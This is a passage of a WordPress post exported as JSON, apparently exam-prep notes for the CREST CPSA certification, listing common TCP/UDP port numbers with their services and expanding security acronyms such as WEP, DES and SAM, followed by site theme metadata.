(POP3)<\/p>\n\n\n\n<p>TCP&amp;UDP 995<br>Post Office Protocol version 3 over TLS\/SSL (POP3S)<\/p>\n\n\n\n<p>TCP&amp;UDP 17<br>Quote of the Day (QOTD)<\/p>\n\n\n\n<p>TCP&amp;UDP 554<br>Real Time Streaming Protocol (RTSP)<\/p>\n\n\n\n<p>UDP 520<br>Routing Information Protocol (RIP)<\/p>\n\n\n\n<p>TCP 513<br>rlogin<\/p>\n\n\n\n<p>UDP 513<br>rwho; ruptime<\/p>\n\n\n\n<p>TCP&amp;UDP 445<br>Microsoft Directory Services (DS) Active Directory (AD)<\/p>\n\n\n\n<p>TCP 445<br>Microsoft Directory Services (DS) Server Message Block (SMB)<\/p>\n\n\n\n<p>TCP 25<br>Simple Mail Transfer Protocol (SMTP)<\/p>\n\n\n\n<p>TCP 465<br>URL rendezvous directory for SSM; authenticated Simple Mail Transfer Protocol over TLS\/SSL (SMTPS)<\/p>\n\n\n\n<p>TCP 22<br>Secure Shell (SSH)<\/p>\n\n\n\n<p>TCP&amp;UDP 111<br>Open Network Computing Remote Procedure Call (ONC RPC)<\/p>\n\n\n\n<p>TCP 514<br>Remote Shell (RSH); rcp<\/p>\n\n\n\n<p>TCP&amp;UDP 49<br>Terminal Access Controller Access-Control System (TACACS) login host protocol; TACACS+<\/p>\n\n\n\n<p>TCP 23<br>Telnet protocol<\/p>\n\n\n\n<p>UDP 69<br>Trivial File Transfer Protocol (TFTP)<\/p>\n\n\n\n<p>TCP 43<br>WHOIS protocol<\/p>\n\n\n\n<p>TCP 1521<br>Oracle database default listener<\/p>\n\n\n\n<p>TCP&amp;UDP 1433<br>Microsoft SQL Server (MSSQL) database management system server<\/p>\n\n\n\n<p>TCP&amp;UDP 1434<br>Microsoft SQL Server (MSSQL) database management system monitor<\/p>\n\n\n\n<p>TCP&amp;UDP 177<br>X Display Manager Control Protocol (XDMCP)<\/p>\n\n\n\n<p>TCP 3306<br>MySQL<\/p>\n\n\n\n<p>TCP&amp;UDP 33434<br>traceroute<\/p>\n\n\n\n<p>TCP 3128<br>Squid<\/p>\n\n\n\n<p>TCP&amp;UDP 1194<br>OpenVPN<\/p>\n\n\n\n<p>TCP&amp;UDP 1524<br>ingres<\/p>\n\n\n\n<p>TCP 50000<br>IBM Db2<\/p>\n\n\n\n<p>TCP 5432<br>PostgreSQL database system<\/p>\n\n\n\n<p>TCP 512<br>Rexec<\/p>\n\n\n\n<p>Structured Query Language<br>SQL<\/p>\n\n\n\n<p>Wired Equivalent Privacy<br>WEP<\/p>\n\n\n\n<p>Data Encryption Standard<br>DES<\/p>\n\n\n\n<p>Trivial File Transfer Protocol<br>TFTP<\/p>\n\n\n\n<p>Local Security Authority<br>LSA<\/p>\n\n\n\n<p>Security Accounts Manager<br>SAM<\/p>\n\n\n\n<p>Pretty Good Privacy<br>PGP<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Crest cpsa exam practice testcrest cpsa exam costcrest cpsa exam questions and answerscrest cpsa exam dumpCrest cpsa exam questionscrest cpsa pass markcrest cpsa coursecrest cpsa exam github TCPTransmission Control Protocol UDPUser Datagram Protocol Port 21FTP FTPFile Transfer Protocol Port 22SSH SSHSecure Shell Port 23Telnet Port 25SMTP SMTPSimple Mail Transfer Protocol Port 49TACACS TACACSTerminal Access Controller [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[],"tags":[],"class_list":["post-110842","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/posts\/110842","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/comments?post=110842"}],"version-history":[{"count":0,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/posts\/110842\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/media?parent=110842"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/categories?post=110842"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.learnexams.com\/blog\/wp-json\/wp\/v2\/tags?post=110842"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}